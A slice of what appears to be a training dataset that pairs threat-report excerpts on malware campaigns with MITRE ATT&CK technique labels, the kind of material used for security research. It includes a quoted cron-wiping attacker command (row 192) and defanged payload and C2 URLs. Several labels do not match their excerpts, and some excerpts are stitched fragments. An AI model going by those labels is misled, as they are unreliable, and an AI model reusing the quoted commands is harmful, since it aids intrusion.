| 174 | Summary In early May, Unit 42 discovered an attack campaign against at least one defense company in Russia and one unidentified organization in South Korea delivering a variant of Bisonal malware. While not previously publicly documented, the variant has been in the wild since at least 2014. There are three primary differences between it and older Bisonal malware including a different cipher and encryption for C2 communication, and a large rewrite of the code for both network communication and maintaining persistence. The adversary behind these attacks lured the targets into launching the Microsoft Windows executable malware by masquerading it as a PDF file (using a fake PDF icon) and reusing publicly available data for the decoy PDF file’s contents. Attacks using Bisonal have been blogged about in the past. We believe it is likely these tools are being used by one group of attackers. Though Bisonal malware has been in the wild for at least seven years and frequently updated, the actors keep using same high-level playbooks. Common features of attacks involving Bisonal include | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 175 | After decoding the PDF and AppleSeed payload, the content gets written into the ProgramData directory. At the end, the decoy PDF file is opened by calling Wscript.Shell.Run and the AppleSeed payload executed through PowerShell by calling regsvr32.exe. Calling regsvr32.exe to run a DLL registers it as a server that automatically calls the DLL export function that has been named DllRegisterServer | ['T1218.010 - Signed Binary Proxy Execution: Regsvr32'] | fine_tune |
| 176 | To illustrate a real example of how this worked and looked to a website visitor, the following section will use one of the few pages of the fake site baomoivietnam[.]com that was designed to profile visitors and deliver malware or a phishing link. On this site, a news story (https://www.baomoivietnam[.]com/dai-hoc-ton-duc-thang-hieu-truong-lam-quyen-de-xay-ra-sai-pham/) about an investigation into potential improper conduct by a university professor in Vietnam contained malicious content. Once the page was accessed, a special OceanLotus server on the hostname cdn.arbenha[.]com would be leveraged to load malicious JavaScript to load a fake video player. At first, the page would display a dialog indicating that the video was loading (Đang tải) as shown in Figure 1 below | ['T1598.003 - Spearphishing Link'] | fine_tune |
| 177 | In November 2019, when MegaCortex v4 appeared, there was a rollback of sorts, bringing the Base64 key back into play and using it to decrypt the malware’s components. The implementation was not the same as previous versions, with that Base64 key embedded into the binary and then passed to a decrypting function instead of passing it as an argument to the command-line | ['T1140 - Deobfuscate/Decode Files or Information'] | fine_tune |
| 178 | The script sets up a new HTTP object and then tries to disable the system's local proxy settings | ['T1562.001 - Impair Defenses: Disable or Modify Tools'] | fine_tune |
| 179 | Bisonal main module The DLL (pvcu.dll) is Bisonal malware but using a different cipher for C2 communication that other publicly documented samples. Booz Allen Hamilton in 2014 and AhnLab in 2015 reported on Bisonal using a simple XOR cipher to hide the C2 address strings in the body. The Bisonal sample we observed in this case employs the RC4 cipher with the key “78563412”. To date, all Bisonal samples we have seen using RC4 use this same key. The oldest sample we have dates to 2014, so this variant has been in the wild for several years. For example, the Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2 | ['T1082 - System Information Discovery', 'T1071.001 - Application Layer Protocol: Web Protocols', 'T1140 - Deobfuscate/Decode Files or Information'] | fine_tune |
| 180 | When executed, QakBot will check whether it has previously been executed on the machine by checking for the specified malware folder. If QakBot discovers it is a first time run, it will relaunch itself from cmd.exe with the /C parameter that will inform the loader to proceed and run its Anti-VM checks on the machine and return the results to the parent process. If QakBot detects it is running in a VM environment, then the final payload will not be decrypted since QakBot uses the return value from these checks in its final decryption routine. Figure 7 below shows the QakBot environment check logic | ['T1057 - Process Discovery', 'T1055.012 - Process Injection: Process Hollowing', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1083 - File and Directory Discovery'] | fine_tune |
| 181 | loaddl: a command responsible for downloading and executing additional modules using the rundll32.exe process. selfkill: a command that is responsible for self-terminating and deleting the malware from the machine | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 182 | WMI permanent event subscriptions can be used to trigger actions when specified conditions are met. Attackers often use this functionality to persist the execution of backdoors at system start up. Subscriptions consist of three core WMI classes: a Filter, a Consumer, and a FilterToConsumerBinding. WMI Consumers specify an action to be performed, including executing a command, running a script, adding an entry to a log, or sending an email. WMI Filters define conditions that will trigger a Consumer, including system startup, the execution of a program, the passing of a specified time and many others. Creating a WMI permanent event subscription requires administrative privileges on a system | ['T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription'] | fine_tune |
| 183 | The RTF file contains macro codes that will execute a PowerShell command to retrieve a dynamic-link library (DLL) file before executing it using odbcconf.exe, a command-line utility related to Microsoft Data Access Components. The DLL will drop and execute a malicious JScript using regsvr32.exe, another command-line utility, to download another JScript and execute it using the same regsvr32.exe. During analysis, we received a PowerShell command that downloads Cobalt Strike from hxxps://5[.]135[.]237[.]216[/]RLxF | ['T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1218.010 - Signed Binary Proxy Execution: Regsvr32', 'T1218.008 - Signed Binary Proxy Execution: Odbcconf'] | fine_tune |
| 184 | In additional to the browsers credential stealer, Olympic Destroyer drops and executes a system stealer. The stealer attempts to obtain credentials from LSASS with a technique similar to that used by Mimikatz | ['T1555.003 - Credentials from Password Stores: Credentials from Web Browsers', 'T1003.001 - OS Credential Dumping: LSASS Memory'] | fine_tune |
| 185 | The SOMBRAT backdoor is packaged as a 64-bit Windows executable. It communicates with a configurable command and control (C2) server via multiple protocols, including DNS, TLS-encrypted TCP, and potentially WebSockets. The backdoor's primary purpose is to download and execute plugins provided via the C2 server. In contrast to the SOMBRAT version published in November 2020, Mandiant observed additional obfuscation and armoring to evade detection, this SOMBRAT variant has been hardened to discourage analysis. Program metadata typically included by the compiler has been stripped and strings have been inlined and encoded via XOR-based routines | ['T1095 - Non-Application Layer Protocol'] | fine_tune |
| 186 | As seen in the above image, the Bazar backdoor can handle quite a few commands. This next section focuses on case 1, which retrieves various pieces of additional information on the infected machine | ['T1005 - Data from Local System'] | fine_tune |
| 187 | 2) Scan the network environment of the infected machine; checks for availability of specific ports on servers that share the same internal and external subnet mask (i.e 255.255.0.0\16). 3) Try to exploit the following Remote Code Execution vulnerabilities in the targeted servers | ['T1046 - Network Service Discovery'] | fine_tune |
| 188 | Harvest cookies and a password database for supported browsers. Supports: Win7 IE, Win10 IE, Edge, Chrome, and Naver Whale - Recursively search a path and upload file metadata (timestamps, size, and full path). - Spawn a thread to recursively search a path and upload files as a ZIP archive | ['T1539 - Steal Web Session Cookie'] | fine_tune |
| 189 | A recent Lokibot campaign has been spotted, which made use of a tunneling service to spread the malware. According to My Online Security, threat actors behind this campaign leveraged a service known as Ngrok. As claimed on the website, Ngrok reveals servers in NATs and Firewalls over secure tunnels. Hence, the service acted as a direct tunnel or a VPN which the actors exploited to push the malware through spam emails | ['T1572 - Protocol Tunneling'] | fine_tune |
| 190 | The script itself works as a downloader for additional files needed for loading the malware into the system, which are hosted separately as a ZIP package. We confirmed two different techniques used for distributing the Melcoz backdoor: the AutoIt loader script and DLL Hijack | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 191 | The Magic Hound campaign was also discovered deploying an IRC Bot, which we have named MagicHound.Leash. We discovered this connection when we observed a DropIt sample installing a backdoor Trojan that used IRC for its C2 communications | ['T1113 - Screen Capture'] | fine_tune |
| 192 | 5) Downloads the ‘kinsing’ malware and runs it 6) Uses crontab to download and run the shell script every minute 7) Looks for other commands running in cron, and if ones were identified, deletes all cron jobs, including its own. We are not certain why the attackers chose to do so, but that is what the script executes:crontab -l || sed '/update.sh/d' || crontab | ['T1059.004 - Command and Scripting Interpreter: Bash', 'T1053.003 - Scheduled Task/Job: Cron'] | fine_tune |
| 193 | Once on a victim’s PC, the dropper executable is launched and it decrypts and loads the Gh0stRAT DLL into memory. It then passes the config buffer to the extracted DLL and calls the exported function (Shellex | ['T1129 - Server Software Component'] | fine_tune |
| 194 | The Warzone RAT can steal credentials from the Outlook and Thunderbird email clients as shown in the image below (figure 10 | ['T1555.003 - Credentials from Password Stores: Credentials from Web Browsers'] | fine_tune |
| 195 | Emotet could be dropping malware with Remote Access Trojan (RAT) capabilities damaging the integrity of the overall network. After reviewing systems for Emotet indicators, reimage and move clean systems to a containment VLAN, segregated from the infected network. It is possible that the Outlook account may now have rules to auto-forward all emails to an external email address, which could result in a data breach. Search base64 encoded network stream data referencing the organization’s email domain. If references are found, perform additional analysis to see if a data breach has occurred | ['T1114.001 - Email Collection: Local Email Collection'] | fine_tune |
| 196 | Attack overview . Flagpro is used in the initial stage of attacks to investigate target’s environment, download a second stage malware and execute it. Flagpro communicates with a C&C server, and it receives commands to execute from the server, or Flagpro downloads a second stage malware and then executes it. Therefore, Flagpro may have already been used for attacking cases at that point. We call this sample using MFC as “Flagpro v2.0” and old one as “Flagpro v1.0” in this article. Once Flagpro is launched, it communicate with a C&C server and executes the received commands as shown in the above list. If it is not included in both Download Command fields in the command, Flagpro will not execute the main processes such as downloading, executing OS commands, collecting authentication information, and so on. If a Download Command field has “ExecYes”, Flagpro downloads and executes the file. In requesting commands, sending execution results of OS commands or collected authentication information, Flagpro accesses a C&C server with specific URL paths and queries. Following image is an example of the response: Detections . To detect attacks using Flagpro, it is effective to create and install custom signature both on network and endpoint devices. In addition, the investigation commands after Flagpro establishes the connection with the C&C server like following are also useful for detection | ['T1069.001 - Permission Groups Discovery: Local Groups'] | fine_tune |
| 197 | Figure 5 Uploading a file to server via RGDoor Downloading a file from the server via RGDoor | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 198 | If the configuration is parsed successfully, the program writes the string "Meteor has started. to an encrypted log file, suggesting that the internal name of the malware is “Meteor“. As we will see later on in this article, another name was used in previous attacks. Throughout the entire execution of the malware, it keeps logging its actions to this same encrypted log file. Appendix C contains a helper script to decrypt the log file | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 199 | Alongside evidence of compromise of the organization itself, Symantec also found a copy of one of the company’s own files, relating to its messaging software, on a staging server used by Chafer. The file was in a directory alongside a number of hacking tools used by the attackers | ['T1005 - Data from Local System'] | fine_tune |
| 200 | Skidmap uses fairly advanced methods to ensure that it and its components remain undetected. For instance, its use of LKM rootkits — given their capability to overwrite or modify parts of the kernel — makes it harder to clean compared to other malware. In addition, Skidmap has multiple ways to access affected machines, which allow it to reinfect systems that have been restored or cleaned up | ['T1059.004 - Command and Scripting Interpreter: Bash'] | fine_tune |
| 201 | During this activity, we noticed the wiper changing the system time to August 2012, as the temporary license key for the RawDisk driver requires the system time to not exceed the month of August, which is when the temporary license would expire. This modification to the system time was seen in the previous campaign, and the temporary license key within the wiper component is the exact same as wiper component from the 2012 attacks. The wiper itself queries the following registry keys to obtain a list of partitions to overwrite | ['T1012 - Query Registry'] | fine_tune |
| 202 | Of note, we also discovered the Sofacy group using a very similar delivery document to deliver a new Trojan called Cannon. Cannon uses SMTPS and POP3S as its C2 channel compared to Zebrocy that uses a more commonly observed HTTP or HTTPS based C2. Add the layer of encryption that the SMTPS and POP3S protocols provide to the legitimate web-based service and you have a very difficult C2 channel to block | ['T1071.003 - Mail Protocols'] | fine_tune |
| 203 | If you use /p, del displays the name of a file and sends the following message: FileName, Delete (Y/N)? To confirm the deletion, press Y. To cancel the deletion and display the next file name (that is, if you specified a group of files), press N. For example, the following command deletes all of the files in the \Work folder: Copy del \work - You can use wildcards (* and ?) to delete more than one file at a time. However, to avoid deleting files unintentionally, you should use wildcards cautiously with the del command. For example, if you type the following command: Copy del *.* The del command displays the following prompt: Are you sure (Y/N)? To delete all of the files in the current directory, press Y and then press ENTER. To cancel the deletion, press N and then press ENTER | ['T1070.004 - Indicator Removal on Host: File Deletion'] | fine_tune |
| 204 | To do this, Tick uses a number of publicly available hacktools such as Mimikatz, GSecdump, and Windows Credential Editor | ['T1003.001 - OS Credential Dumping: LSASS Memory'] | fine_tune |
| 205 | Win32/Diskcoder.D has the ability to spread via SMB. First, it scans internal networks for open SMB shares. It looks for the following shares | ['T1135 - Network Share Discovery'] | fine_tune |
| 206 | In January 2016 we published our analysis of a spearphishing attack against energy companies in Ukraine. That attack probably has a connection to the infamous BlackEnergy attacks in 2015 because the attackers used exactly the same mail server to send spearphishing messages. However, the attacks in January 2016 were different. Instead of using the BlackEnergy malware family, the attackers used a relatively simple open-source backdoor, written in the Python programming language, called GCat. The Python code of the GCat backdoor was obfuscated, then converted into a stand-alone executable using the PyInstaller program | ['T1070.004 - Indicator Removal on Host: File Deletion'] | fine_tune |
| 207 | HttpBrowser is a remote access tool whose name originates from the hard-coded "HttpBrowser/1.0" User-Agent. Table 2 lists the commands available to threat actors in one of the HttpBrowser variants | ['T1083 - File and Directory Discovery'] | fine_tune |
| 208 | When the malicious RTF document is opened, two things happen that allow the attacker malware to run. First, the "packager trick" is leveraged in order to embed the initial QuasarRAT dropper (qrat.exe) in the malicious RTF document. Its called the "packager trick" because any file embedded in an RTF file using packager will be automatically dropped to the %tmp% folder (c:\Users\%username%\AppData\Local\Temp) when the RTF document is opened. Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious "scriptlet" file, or .sct file, which is also embedded in the malicious RTF document. The contents of the malicious scriptlet file (displayed below) clearly show the threat actor executing the initial "qrat.exe" dropper from the current user's %tmp% directory | ['T1204.002 - User Execution: Malicious File'] | fine_tune |
| 209 | It uses two components to avoid detection by a single component. The dropper uses an old trick in a new way: It appends the RAT to a Word document. Upon opening the document, a macro is executed that will extract the malware and execute it | ['T1059.005 - Command and Scripting Interpreter: Visual Basic'] | fine_tune |
| 210 | Finally, the attacker added their own devices as allowed IDs for active sync for a number of mailboxes using Set-CASMailbox | ['T1098.005 - Device Registration', 'T1098.002 - Account Manipulation: Additional Email Delegate Permissions'] | fine_tune |
| 211 | SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial analyzed sample. It also makes use of application shimming [1] for persistence | ['T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
| 212 | 1) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. The content of both files is shown in the appendix section of this report. Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. When Drive.vbs is eventually executed by the task scheduler, it will download the BackConfig executable payload. and only continues if the file exists. 3) Similarly, the VBA code then writes batch code to another text file - Audio.txt. The content of both files is shown in the appendix section of this report. 6) Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. When Drive.vbs is eventually executed by the task scheduler, it will download the BackConfig executable payload. and only continues if the file exists | ['T1083 - File and Directory Discovery'] | fine_tune |
| 213 | 1) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. Similarly, the VBA code then writes batch code to another text file - Audio.txt. The content of both files is shown in the appendix section of this report. Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. In the case of file 8892279f3. the remote location is http://185.203.119[.]184/Dropbox/request. and only continues if the file exists. 2) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. 3) Similarly, the VBA code then writes batch code to another text file - Audio.txt. 6) Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. In the case of file 8892279f3. the remote location is http://185.203.119[.]184/Dropbox/request | ['T1070.004 - Indicator Removal on Host: File Deletion'] | fine_tune |
| 214 | The dropped file is executed after terminating any process with the same name. For persistence, it adds a shortcut for the file at the %STARTUP% directory | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 215 | The data exfiltration process runs in the following sequence: The temp.ini files are copied into a text file that matches the pattern | ['T1020 - Automated Exfiltration'] | fine_tune |
| 216 | Recursively generate a list of files in a directory and send to the control server - Terminate a specific process. The process is identified by the control server sending the PID to the malware | ['T1057 - Process Discovery', 'T1543.003 - Create or Modify System Process: Windows Service', 'T1119 - Automated Collection'] | fine_tune |
| 217 | Upon opening the attachment, a typical luring mechanism is employed instructing the victim to enable macros, as seen in Figure 2. FireEye has observed the attackers behind this campaign using three different approaches | ['T1204.002 - User Execution: Malicious File'] | fine_tune |
| 218 | After the files are encrypted the program will write a ransom note to each folder and directory on the system called read_me_unlock.txt | ['T1047 - Windows Management Instrumentation'] | fine_tune |
| 219 | In october 2016 Group-IB published the report about the Cobalt group. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Therefore, the Cobalt group registered domains are similar to real ones (for example, diebold.pw), and configured their email server to distribute acting as these legitimate domains (fig. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. The goal is to set the startup path to the executable file or program code, launching it with the powershell.exe shell command to access the Internet resource specified in the code in order to download and install Cobalt Strike module. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. Cobalt Strike provides the ability to use the Artifact Kit framework for these purposes and even modify it, as it is distributed in the source code. Use of standard tools Cobalt Strike is publicly accessible, and can be downloaded in order to learn and create detection rules on the network. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed | ['T1059.001 - Command and Scripting Interpreter: PowerShell'] | fine_tune |
| 220 | The exploit used, named EternalBlue, exploits a vulnerability in the Server Message Block (SMB) protocol which allows the malware to spread to all unpatched Windows systems from XP to 2016 on a network that have this protocol enabled. This vulnerability allows remote code execution over SMB v1. WannaCry utilizes this exploit by crafting a custom SMB session request with hard-coded values based on the target system. Notably, after the first SMB packet sent to the victim’s IP address, the malware sends two additional packets to the victim containing the hard-coded IP addresses 192.168.56.20 and 172.16.99.5 | ['T1563.002 - Remote Service Session Hijacking: RDP Hijacking'] | fine_tune |
| 221 | The file /tmp/.rOuYXzdOF was most likely used as a mutex, ensuring only one copy of Netwire could run at a time. Next, .default.conf was a configuration file storing data required for Netwire to communicate with command and control. On the Windows side, this is usually stored in the Registry | ['T1112 - Modify Registry'] | fine_tune |
| 222 | This time, the text is from the novel "The Brothers Karamazov" by Fyodor Dostoevsky (a Russian writer). The malicious document drops a Python interpreter and PoetRAT. The author made a few changes to the PoetRAT malware, though. First, the malware uses pyminifier to obfuscate the Python script and avoid detection based on string or YARA rules: The obfuscation is a base64 and an LZMA compression algorithm. For example, the variables are stored in a "Constant.py" file containing the C2 server and the configuration. The most notable change is the protocol used to download and upload files | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 223 | The backdoor determines its C2 server using a Domain Generation Algorithm (DGA) to construct and resolve a subdomain of avsvmcloud[.]com. The Update method is responsible for initializing cryptographic helpers for the generation of these random C2 subdomains. Subdomains are generated by concatenating a victim userId with a reversible encoding of the victims local machine domain name | ['T1132.001 - Data Encoding: Standard Encoding'] | fine_tune |
| 224 | The attack starts with a phishing email that contains a malicious link to a file hosted on Google Docs named “Annual Bonus Report.doc”. When the user clicks on the link, the TrickBot dropper downloads onto the target machine. This differs from previous TrickBot attacks we have seen, where TrickBot is usually dropped through a Microsoft Office document or by another malware like Emotet | ['T1204.002 - User Execution: Malicious File', 'T1566.002 - Phishing: Spearphishing Link'] | fine_tune |
| 225 | Ahnlab, a South Korean software company, simultaneously published a paper regarding Bisonal's activity in South Korea. In this case, the infection vector has changed from previous samples. The initial stage is a binary that drops a decoy document (Powerpoint or Excel document), a VisualBasic script and the packed Bisonal payload. The payload is dropped with a .jpg extension that's been renamed to ".exe. The payload has been packed with a new packer. The code of Bisonal is similar to the version of 2019 | ['T1137.006 - Office Application Startup: Add-ins'] | fine_tune |
| 226 | One of the discovered MarkiRAT variants was used to intercept the execution of Telegram and launch the malware along with it. The core of the malware is the same as described previously for MarkiRAT, with the exception of functions in charge of the malware’s deployment on the victim machine | ['T1518.001 - Software Discovery: Security Software Discovery'] | fine_tune |
| 227 | This behavior is detailed later in the blog under "Malware Functionality". Unlike WannaCry, Nyetya does not appear to contain an external scanning component. Two of the executables are used to recover user credentials (32 and 64 bits) while the third one is the PsExec binary. For example: The dropped .tmp executable seems to be based on Mimikatz, a popular open source tool used for recovery of user credentials from computer memory using several different techniques. The recovered credentials are then used for launching malware on the remote system using WMIC and PsExec. These mechanisms are used to attempt installation and execution of perfc.dat on other devices to spread laterally. The two exploits drop a modified version of DoublePulsar which is a persistent backdoor running in kernel space of the compromised system. The developer modified only few bytes from the original version but this modification allowed it to evade network detection and the open source DoublePulsar scanning tools available on the Internet. The modification can be divided in 3 parts: - The attacker modified the command codes: - The attacker modified the response codes: - The attacker modified where the response code is stored in the SMB response packet. PsExec is used to execute the following instruction (where w.x.y.z is an IP address) using the current user's windows token (from the "Recovery of User Credentials" section above) to install the malware on the networked device. WMI is used to execute the following command which performs the same function as above, but using the current user's username and password (as username and password), retrieved from the "Recovery of User Credentials" section above | ['T1003.001 - OS Credential Dumping: LSASS Memory'] | fine_tune |
| 228 | For persistence and remote control, the script downloads another base64-encoded Python script from hxxps://ptpb[.]pw/OAZG. After several steps of de-obfuscation, we found the attackers using EmPyre for post-exploitation control. EmPyre is a Python post-exploitation agent built on cryptologically-secure communications and a flexible architecture | ['T1059.006 - Command and Scripting Interpreter: Python'] | fine_tune |
| 229 | When required by the attacker, it is capable of remotely activating the microphone on the compromised computer and capturing sounds. The audio recordings are encoded to MP3 format using a legitimate lame.dll library, which is downloaded and misused by the malware | ['T1123 - Audio Capture'] | fine_tune |
| 230 | 2022–01–15, MSTIC (Microsoft Threat Intelligence Center) identified and unveiled a cyberattack targeting Ukrainian organizations with “WhisperGate” overwrites Master Boot Record(MBR) and files | ['T1561.002 - Disk Structure Wipe'] | fine_tune |
| 231 | The AppleSeed payload has an export function named “DllRegisterServer” which will be called when the DLL is executed using RegSvr32.exe. DllRegisterServer has a function that is responsible for performing the DLL initialization and setup that includes the following steps | ['T1059.007 - Command and Scripting Interpreter: JavaScript', 'T1059.001 - Command and Scripting Interpreter: PowerShell'] | fine_tune |
| 232 | Yet, both in August 2018 and 2019 Silent Librarian was lining up for the new academic years, once again targeting the same kind of victims in over a dozen countries | ['T1598.003 - Spearphishing Link'] | fine_tune |
| 233 | Manage the use of privileged accounts. Configure access controls, including file, directory, and network share permissions with the principle of least privilege in mind. If a user only needs to read specific files, they should not have write access to those files, directories, or shares. Secure use of WMI by authorizing WMI users and setting permissions. Disable or limit remote WMI and file sharing. Block remote execution through PSEXEC. Segregate networks and functions. Harden network devices and secure access to infrastructure devices. Perform out-of-band network management. Disable SMBv1 and block all versions of SMB at the network boundary by blocking TCP port 445 with related protocols on UDP ports 137-138 and TCP port 139; this applies to all boundary devices | ['T1021.002 - Remote Services: SMB/Windows Admin Shares'] | fine_tune |
| 234 | The original malware scans the list of running process looking for outlook, iexplore or firefox. If found it injects the DLL into the process | ['T1055.001 - Process Injection: Dynamic-link Library Injection', 'T1057 - Process Discovery'] | fine_tune |
| 235 | Download a file from a remote server - Create a text file on the local machine - Execute a file - Execute a shell (cmd.exe) command and save the results to disk - Upload the results of a previously executed shell command to a remote server | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 236 | The main purpose of P8RAT is downloading and executing payloads (consisting of PE and shellcode) from its C2 server. However, we were unable to obtain any sample of the subsequent payloads for this malware | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 237 | Unlike previous RDAT samples, this particular sample only uses DNS tunneling for its C2 communications with no HTTP fallback channel. This RDAT sample can only use TXT queries in its DNS tunnel and will issue queries structured like the following | ['T1071.004 - Application Layer Protocol: DNS', 'T1008 - Fallback Channels'] | fine_tune |
| 238 | Other researchers have attributed these attacks to a group known as the Cobalt Gang, which has continued its activities even after the arrest of its alleged leader in Spain this year. AppLocker works well for executables and over time it has also been improved to control various script types, including JScript, PowerShell and VBScript. This has significantly reduced the attack surface and forced attackers, including more sophisticated groups, to find new methods of launching executable code. Payload dropper in an XSL file Another executable used to attempt bypass of the AppLocker feature is msxsl.exe, a Windows utility used to run XSL (eXtensible Stylesheet Language) transformations. Stage 4 — Downloaders . PowerShell leading to shellcode . The PowerShell chain is launched from an obfuscated JScript scriptlet previously downloaded from the command and control (C2) server and launched using cmstp.exe. JScript downloader . As opposed to PowerShell loading a Cobalt Strike beacon, the other observed infection chain continues using JScript to deliver the final payload, which is a JScript backdoor. The commands are relatively limited, but are sufficient enough to instruct the backdoor to download and execute a new payload, remove itself from the system or download and launch additional scriptlets. Interestingly, if an attack used version 4.4, the attackers decided to add a variable "researchers" initialized to the string "We are not cobalt gang, stop associating us with such skids. Cobalt Strike beacon . On the PowerShell side of the infection chain, the downloaded final payload is a Cobalt Strike beacon, which provides the attacker with rich backdoor functionality. Cobalt Strike is used by penetration testers and offensive security researchers when delivering their services, but it is generally, just as Meterpreter, detected by anti-malware software as it can be easily used by malicious actors | ['T1059.001 - Command and Scripting Interpreter: PowerShell'] | fine_tune |
| 239 | DUBNIUM (which shares indicators with what Kaspersky researchers have called DarkHotel) is one of the activity groups that has been very active in recent years, and has many distinctive features | ['T1518.001 - Software Discovery: Security Software Discovery'] | fine_tune |
| 240 | The malware initializes by gathering system and malware filename information and creates a mutex to make sure only one instance of the Trojan executes on the system at a time. Kazuar generates its mutex by using a process that begins with obtaining the MD5 hash of a string “[username]=>singleton-instance-mutex”. The Trojan then encrypts this MD5 hash using an XOR algorithm and the serial number of the storage volume. Kazuar uses the resulting ciphertext to generate a GUID that it appends to the string “Global\\” to create the mutex | ['T1087.001 - Account Discovery: Local Account', 'T1082 - System Information Discovery'] | fine_tune |
| 241 | Key takeaways: - TeamTNT is using new, open source tools to steal usernames and passwords from infected machines. The campaign has been active for approximately one month and is responsible for thousands of infections globally. Background . TeamTNT has been one of the most active threat groups since mid 2020. One of the most recent findings (June 4, 2021) came from Palo Alto researchers who discovered the TeamTNT Chimaera repository. TeamTNT C&C website showing infection statistics . Figure 2. The full list of supported programs can be found on the Lazagne page on Github. Windows module - persistence . Kubernetes root payload component . This component is mainly responsible for installing a cryptocurrency miner on infected devices, allowing the attacker to connect remotely to the system using SSH. Decoded shell script . TeamTNT IRC bot . As described previously this year by Lacework, TeamTNT includes ZiggyStartux in their IRC bot. IRC Bot available commands . TeamTNT AWS stealer . Similar to the other TeamTNT components, the AWS stealer (see figure 11) first installs missing dependencies. Conclusion . AT&T Alien Labs has discovered new malicious files distributed by the threat actor TeamTNT | ['T1518.001 - Software Discovery: Security Software Discovery'] | fine_tune |
| 242 | As mentioned by the Cisco Talos Intelligence Group, after executing the Micropsia registers itself against the C2 server | ['T1082 - System Information Discovery'] | fine_tune |
| 243 | The binary uses a file system watcher in order to generate an event each time a file is modified in one of the directories in the "Paths" variable of the configuration file. Filesystem monitoring routine Once a file is available, the Dog.exe binary exfiltrates it, using email or FTP depending on the configuration | ['T1119 - Automated Collection'] | fine_tune |
| 244 | At line 40, that data is piped through the base64 utility for decoding, dropped in a subfolder in the /tmp directory, given executable permissions via chmod, and then launched as the 2nd stage payload | ['T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification'] | fine_tune |
| 245 | Sodinokibi ransomware, also known as REvil or Sodin, has been responsible for a series of high-profile attacks since April 2019 | ['T1204.002 - User Execution: Malicious File'] | fine_tune |
| 246 | PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Waterbug C&Cs | ['T1555.004 - Credentials from Password Stores: Windows Credential Manager'] | fine_tune |
| 247 | After successfully executing the command, POWRUNER sends the results back to the C2 server and stops execution | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell'] | fine_tune |
| 248 | Retrieves the following data from the system by leveraging Windows Management Instrumentation (WMI) queries and environment variables: IP Address from Network Adapter Configuration OS Name OS Architecture Computer Name Computer Domain Name Username - IP Address from Network Adapter Configuration - OS Name - OS Architecture - Computer Name - Computer Domain Name - Username | ['T1047 - Windows Management Instrumentation', 'T1082 - System Information Discovery', 'T1016 - System Network Configuration Discovery'] | fine_tune |
| 249 | Endpoint Protection . The Trojan.Hydraq Incident . It has been about a week since news of the mysterious Hydraq Trojan (also known as Aurora) attack broke with the unveiling of a threat by Google to pull its operations out of China. Although concrete details of the attacks are not yet public, Google made reference to a number of Gmail accounts that were compromised during or after the attacks. In the more sophisticated attacks, the attacker will use a new zero day vulnerability, as obviously this will have a greater success rate. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. Considering the efforts that the attackers put into staging the attack as a whole, the end malware is not so sophisticated. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. The backchannel URL addresses have been changed by the Dynamic DNS sites to resolve to a loopback address (127.0.0.2). This in effect severs the connection to the control servers. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim’s machine by taking advantage of the vulnerability. The use of browsers other than Internet Explorer by an increasingly large number of people may have helped limit the “attack surface” by reducing the number of computers vulnerable to the Internet Explorer vulnerability used in this attack | ['T1016 - System Network Configuration Discovery'] | fine_tune |
| 250 | One of the most noticeable differences is the use of encryption over the entire TCP segment, as a way for it to evade detection. Additionally, this seems to be a lightweight version of Gh0stRAT, as it only has 12 commands, compared to the 73 for a full Gh0stRAT sample; 3 of those commands are undocumented. Also, unlike most samples that I receive on my honeypot, this sample did not start as a DLL that communicates to a distribution server in order to download the stage1 | ['T1573 - Encrypted Channel', 'T1095 - Non-Application Layer Protocol'] | fine_tune |
